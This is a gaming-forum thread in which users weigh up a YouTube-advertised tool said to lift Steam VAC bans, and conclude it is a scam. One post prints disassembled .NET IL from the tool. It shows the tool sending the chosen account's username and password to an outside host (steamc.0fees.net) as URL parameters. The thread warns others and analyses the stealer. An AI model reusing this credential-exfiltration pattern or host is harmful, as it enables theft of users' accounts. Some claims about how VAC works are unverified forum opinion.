Un VacBan?


New Member
this caught my eye
TROJAN => http://www.youtube.com/watch?v=f2pZYcYg_GM <= TROJAN
some people says it works, others, dont
4 stars, it doesnt ask for the password...
probably someone knows if this is a scam or not

thanks for helping me people, i really appreciate it
Give it a try. Be sure to scan for viruses. IF it's clean and doesn't ask for password, Why not try it?
I wouldnt give try it for several reasons
2. Its uploaders ONLY video so we cannot check his other videos to see if he is trustworty
3. Not enough comments to ensure it is true (remember this was uploaded 30 dec 2008)
4. In the video he selected account from a drop down menu meaning that the program MUST have opend the client registery blob file
or he dosen't want people to know his username so they dont hack his account.

If I had a account that was Vac banned I woul try it but i dont.
or he dosen't want people to know his username so they dont hack his account.

If I had a account that was Vac banned I woul try it but i dont.

uh uh u dont understand at 44 seconds he selects the account in a drop down menu from the program meaning the program searched his computer and opened the client registery.blob file. I dont know how much you know about steam but having others playing around with that means they have access to your account details. If you wana be a noob and try it carry on i wont stop you
No you dummies,it's an obvious keylogger or just useless crap.
You -CAN'T- Unban your self from the VAC.
It's probably an iStealer or some shit that will just end up taking any passwords you have saved. What this guy did was probably pause the video after hitting the "NO VAC" button and login to an account that isn't VAC banned. As you can tell from the drop down menu, he has 2 accounts (one which is probably banned and one that isn't). Then he just unpaused the video, and went to settings on his account that isn't VAC banned. He has the usernames censored out probably so you don't see that he was using 2 different accounts.

VAC is a totally automated system in which no one controls. It detects any modified core .dll files and then within a week bans you. If it were controlled by a group of people, people would contact VALVe/Steam support, give their bullshit stories and get unbanned.
Is a Trojan

callvirt class [System.Windows.Forms]System.Windows.Forms.WebBrowser fisrttest.Form1::get_WebBrowser1()
ldstr "http://steamc.0fees.net/vac2/?user="
callvirt class [System.Windows.Forms]System.Windows.Forms.ComboBox fisrttest.Form1::get_ComboBox1()
callvirt class System.String [System.Windows.Forms]System.Windows.Forms.ComboBox::get_Text()
callvirt class System.String [mscorlib]System.String::ToString()
ldstr "&pass="

Steals username/pass and sends to that site above.
Lol is this an unprotected vb.net account stealer? Kids are getting dumber and dumber everyday...